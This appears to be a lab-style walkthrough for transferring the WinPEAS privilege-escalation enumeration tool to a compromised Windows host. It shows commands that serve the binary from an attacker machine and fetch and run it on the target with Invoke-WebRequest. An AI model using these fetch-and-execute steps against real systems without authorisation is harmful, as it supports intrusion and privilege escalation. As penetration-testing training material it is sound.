WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. This write-up covers how to get it onto a host and run it, and, more broadly, how to complete post-exploitation enumeration activities.

How to

1. Download the script from GitHub (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)

  • git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
  • cd privilege-escalation-awesome-scripts-suite

2. Navigate through the directories to find the binary files

  • cd winPEAS/winPEASexe/binaries/
  • ls

3. Depending on the architecture of the machine you need to use the x64 or x86 build. This demo will be run on an x64 machine, so I choose that one

  • cd x64/Release
  • ls

4. There we have our executable, winPEASx64.exe. We now need to find a way to move it to our target machine and execute it

5. We will start a web server in the directory that holds the binary. Note that a bare netcat listener (nc -lvp 9999) only accepts a raw TCP connection and does not speak HTTP, so IWR in the next step would hang or fail against it; a minimal HTTP server is needed instead

  • python3 -m http.server 9999

6. On the target machine I will use PowerShell (IWR, an alias for Invoke-WebRequest) to fetch the file; from cmd you can also use certutil

  • cd C:\Windows\Temp
  • IWR http://10.10.14.10:9999/winPEASx64.exe -OutFile winPEASx64.exe
  • dir

7. Now that it is on the target, execute it

  • .\winPEASx64.exe

8. Now you can start inspecting the output

Extra

1. Sometimes it is better to try the .bat version if the .exe is failing to run

  • powershell.exe IWR http://192.168.0.12:9999/winPEAS.bat -OutFile winPEAS.bat
  • dir

2. Run the script

  • .\winPEAS.bat